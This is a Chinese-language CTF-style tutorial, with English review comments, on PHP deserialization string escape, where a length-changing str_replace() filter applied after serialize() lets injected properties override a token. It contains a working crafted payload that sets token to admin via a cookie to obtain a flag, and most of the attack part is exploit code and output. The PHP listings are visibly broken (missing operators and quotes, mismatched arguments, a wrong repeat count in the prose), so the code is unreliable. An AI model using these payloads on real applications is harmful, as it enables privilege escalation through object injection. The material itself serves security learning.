首先，必须先明白，这个点并不难，我给大家梳理一遍就会明白。反序列化字符串逃逸，就是序列化过程中逃逸出来字符，是不是很简单？哈哈哈！
好了，不闹了，其实：
这里你们只要懂得一个基础：
serialize() 函数序列化后可以保留其原始数据类型和结构；
而文中自定义的 filter() 函数则可以对序列化后的字符串进行过滤，例如去除不安全的字符，防止代码注入攻击等。具体过滤规则需要根据实际需求来定制。举个栗子：
?php
// NOTE(review): this listing lost its '->', '=' and quote characters in extraction;
// read '$this -username$u' as '$this->username = $u' and 'BTG0' as 'BTG = 0'.
// Plain data class: three public properties, all written by the constructor (BTG hard-coded to 0).
class user{public $username;public $password;public $BTG;public function __construct($u,$p){$this -username$u;$this -password$p;$this-BTG0;}
}
// serialize() prefixes every string value with its byte length (s:<len>:...), as the output below shows.
$unew user(admin,123456);
echo serialize($u);
这里就是最最基础的一个反序列化，然后运行得到的结果是：
O:4:user:3:{s:8:username;s:5:admin;s:8:password;s:6:123456;s:3:BTG;i:0;}
1. 这里在实战中相当于拿到一道题目，先拿到最初的反序列化。接下来我在原来的代码上稍微做个字符串逃逸。
再强调一次：filter() 函数对序列化后的字符串进行过滤，例如去除不安全的字符，防止代码注入攻击等。具体过滤规则需要根据实际需求来定制。
2. 修改一下原来代码，用 filter() 函数对序列化后的字符串进行过滤，进行字符串逃逸。
?php
// Same data class as the first listing (extraction dropped '->', '=' and quote characters).
class user{public $username;public $password;public $BTG;public function __construct($u,$p){$this -username$u;$this -password$p;$this-BTG0;}
// filter() runs AFTER serialize(): it rewrites 'admin' (5 bytes) to 'hacker' (6 bytes) inside the
// serialized text, but the s:5: length prefix that serialize() already wrote is not updated.
// That length/value mismatch is the whole basis of the "string escape" shown further down; the
// safe place for such a replacement is on the field value BEFORE serialize().
}function filter($s){return str_replace(admin,hacker,$s);
}
// NOTE(review): user::__construct takes two arguments but this call passes three, and $s is not
// defined at this point; the output below appears to come from the commented-out call
// new user(admin,123456) instead.
$u new user (admin,hacker,$s);
$u_serializeserialize($u);
$usfilter($u_serialize);//$unew user(admin,123456);
//echo serialize($u);echo $us;O:4:user:3:{s:8:username;s:5:admin;s:8:password;s:6:123456;s:3:BTG;i:0;}// original (before filter)
O:4:user:3:{s:8:username;s:5:hacker;s:8:password;s:6:123456;s:3:BTG;i:0;}// after the replacement: s:5 now precedes a 6-byte value
在序列化字符串中，s:5:hacker 表示字符串类型的属性值，其中 s:5: 表示字符串长度为 5，而实际上应该是 6（hacker）。到这里已经逃逸成功了。这是因为在 filter() 函数中将 admin 替换为 hacker 后，字符串长度发生了变化，导致序列化字符串中的长度信息不准确。
所以接下来，这里我就要把 ;s:3:BTG;i:0; 这里的 BTG 变成 1。
代码：
?php
// How the escape works (defender's view): serialize() wrote s:<len> using the ORIGINAL username
// length. After filter() every 'admin' is one byte longer, so when the text is unserialized the
// parser stops reading the username <len> bytes in — exactly at the end of the injected
// ';s:8:password;...;s:3:BTG;i:1;}' tail — and reads that tail as the remaining properties
// (see the var_dump in the next listing). The genuine tail that follows is presumably left as
// trailing data. Application-side fix: never transform the serialized text; sanitize the fields
// before serialize(), or sign the blob (HMAC checked with hash_equals()) so a tampered length
// cannot be crafted.
class user{public $username;public $password;public $BTG;public function __construct($u,$p){$this -username$u;$this -password$p;$this-BTG0;}
}function filter($s){return str_replace(admin,hacker,$s);
}
// NOTE(review): in this extracted copy the assignment $u_serialize = serialize($u) is fused onto the
// end of the comment on the next line; it belongs on its own line, as in the verification listing.
$u new user (adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin;s:8:password;s:6:123456;s:3:BTG;i:1;},123456,$s);//this just appends ;s:8:password;s:6:123456;s:3:BTG;i:1;} after the admins to fill in the last character; ;s:8:password;s:6:123456;s:3:BTG;i:1;} is 45 characters, so 45 admins in total, because each replacement escapes one character and must therefore be repeated 45 times$u_serializeserialize($u);
$usfilter($u_serialize);echo($u_serialize);
结果：O:4:user:3:{s:8:username;s:270:hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker;s:8:password;s:6:123456;s:3:BTG;i:1;};s:8:password;s:6:123456;s:3:BTG;i:0;}
其实到这里就搞定了。如果不放心，那就 var_dump 把反序列化输出出来。验证阶段：
?php
// Verification of the previous step: same class, filter and payload, then unserialize() on the
// filtered text and a var_dump of the result.
class user{public $username;public $password;public $BTG;public function __construct($u,$p){$this -username$u;$this -password$p;$this-BTG0;}
}function filter($s){return str_replace(admin,hacker,$s);
}
$u new user (adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin;s:8:password;s:6:123456;s:3:BTG;i:1;},123456,$s);
$u_serializeserialize($u);
// The dump below shows [BTG] int(1) although the constructor hard-codes BTG to 0: the injected tail,
// not the original properties, was parsed. This is exactly the check a regression test for a
// "filter after serialize" bug should make — compare the unserialized object against what was
// constructed, not just whether unserialize() succeeded.
$usfilter($u_serialize);$objunserialize($us);var_dump($obj);
结果：object(user)#2 (3) { [username] string(270) hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker [password] string(6) 123456 [BTG] int(1) }
这里 BTG 从 0 变成了 1，说明你是污染成功了的。因为我的原代码里面写死了 BTG 是 0 的，现在变成了 1，所以证明反序列化是成功了。
我说，现在大家应该都已经懂得反序列化字符串逃逸的一半了。不信？让我来引导大家做道例题就好了。
?php # message.php error_reporting(0); class message{ public $from; public $msg; public $to; public $tokenuser; public function __construct($f,$m,$t){ $this-from $f; $this-msg $m; $this-to $t; } } $f $_GET[f]; $m $_GET[m]; $t $_GET[t]; if(isset($f) isset($m) isset($t)){ $msg new message($f,$m,$t); $umsg str_replace(fuck, loveU, serialize($msg)); setcookie(msg,base64_encode($umsg)); echo Your message has been sent; } highlight_file(__FILE__);
字符串逃逸特征：$umsg = str_replace(fuck, loveU, serialize($msg));
做这种题就三步走，千万别给自己加戏：
第一步，先拿到一个正常最初的反序列化。
代码如下：
?phpclass message{public $from;public $msg;public $to;public $tokenuser;public function __construct($f,$m,$t){$this-from$f;$this-to$t;}}
// Step 1: obtain the untouched serialized form (extraction dropped '->', '=' and quotes).
// NOTE(review): in this copy of the constructor msg is never assigned (only from and to are), which
// is why the output shows s:3:msg;N;. token keeps its declared default 'user'
// ($tokenuser = public $token = 'user'), matching s:5:token;s:4:user in the output.
// filter() is defined here but not called yet; this listing only prints the baseline.
function filter($msg){return str_replace(fuck,loveU,$msg);
}
$msgnew message(a,b,c);$msg_1serialize($msg);echo $msg_1;O:7:message:4:{s:4:from;s:1:a;s:3:msg;N;s:2:to;s:1:c;s:5:token;s:4:user;} 第二步使用filter进行一次字符串逃逸。
?phpclass message{public $from;public $msg;public $to;public $tokenuser;public function __construct($f,$m,$t){$this-from$f;$this-to$t;}}
// Step 2: apply filter() once to the serialized text. 'fuck' (4 bytes) becomes 'loveU' (5 bytes)
// while the prefix serialize() wrote stays s:4, as the output shows (s:4:loveU). One extra byte per
// replacement is what the next step relies on.
// NOTE(review): the output shows s:3:msg;s:1:b even though this constructor does not assign msg;
// the printed result appears to come from a version of the class that does (see the next listing).
function filter($msg){return str_replace(fuck,loveU,$msg);
}
$msgnew message(fuck,b,c);$msg_1serialize($msg);$msg_2filter($msg_1);echo $msg_2;
O:7:message:4:{s:4:from;s:4:loveU;s:3:msg;s:1:b;s:2:to;s:1:c;s:5:token;s:4:user;}第三步算出要逃逸的次数进行复制输出
s:4:loveU 很明显逃逸一个字符，因为每次逃逸一个字符。;s:3:msg;s:1:b;s:2:to;s:1:c;s:5:token;s:4:user;} 这里有 62 个字符要逃逸，所以必须复制 61 次 fuck。还有，这得改成 ;s:3:msg;s:1:b;s:2:to;s:1:c;s:5:token;s:5:admin;}，因为后面需要 admin 权限。
简单来说，就是把 ;s:3:msg;s:1:b;s:2:to;s:1:c;s:5:token;s:5:admin;} 丢到 fuck 后面，然后根据字符个数复制几次就完成了。
?phpclass message{public $from;public $msg;public $to;public $tokenuser;public function __construct($f,$m,$t){$this-from$f;$this-msg$m;$this-to$t;}}
// Step 3, defender's view: serialize() records the original byte length of $from; filter() then
// grows every 'fuck' by one byte without updating that length. The declared length therefore ends
// exactly where the injected ';s:3:msg;...;s:5:token;s:5:admin;}' tail begins, so on unserialize()
// that tail should be read as the object's real properties (token = admin) and the genuine tail
// becomes trailing data.
// NOTE(review): the prose above says 61 copies, but s:310 in the output equals 62 copies × 4 bytes
// plus the 62-byte tail, so this listing actually uses 62 copies — one per escaped byte.
// Application-side fix: sanitize before serialize(), or sign the blob and verify it with
// hash_equals() before unserialize(); better still, never unserialize() client-supplied data.
function filter($msg){return str_replace(fuck,loveU,$msg);
}
$msgnew message(fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck;s:3:msg;s:1:b;s:2:to;s:1:c;s:5:token;s:5:admin;},b,c);$msg_1serialize($msg);$msg_2filter($msg_1);echo $msg_2; O:7:message:4:{s:4:from;s:310:loveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveU;s:3:msg;s:1:b;s:2:to;s:1:c;s:5:token;s:5:admin;};s:3:msg;s:1:b;s:2:to;s:1:c;s:5:token;s:4:user;}
搞定了，这就完成了。如果不放心可以加一步验证，因为数很多字符容易出错，也就改一下输出那个，半分钟就好。最终变成了 admin，说明我们反序列化成功了。
?php highlight_file(__FILE__); include(flag.php); class message{ public $from; public $msg; public $to; public $tokenuser; public function __construct($f,$m,$t){ $this-from $f; $this-msg $m; $this-to $t; } } if(isset($_COOKIE[msg])){ $msg unserialize(base64_decode($_COOKIE[msg])); if($msg-tokenadmin){ echo $flag; } }
这道题目还有一点尾巴这道题目还有一点隐藏代码接下来把fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck;s:3:msg;s:1:b;s:2:to;s:1:c;s:5:token;s:5:admin;}加入道cookie就能拿到flag了
最后的最后，再进行一次总结：字符串逃逸有三步：
1. 拿到正常序列化后字符串。这个题目都会给代码，你直接复制然后反序列化就好，没什么技术含量。
2. 使用 filter 进行一次字符串逃逸。
3. 算出要逃逸的次数，进行复制输出。但是这里一定要提醒大家一下：字符串逃逸分为增多和减少，苦于篇幅，上面我只介绍了一种（增多），另外一种也是可以使用本方法的，只是有些地方要改一下，这个等我之后再更新文章。
ps：记住，无论字符串逃逸是增多还是减少，都是因为 return str_replace 这个玩意替换字符后造成的逃逸。
希望我的文章能够帮助大家，谢谢看到这里的各位。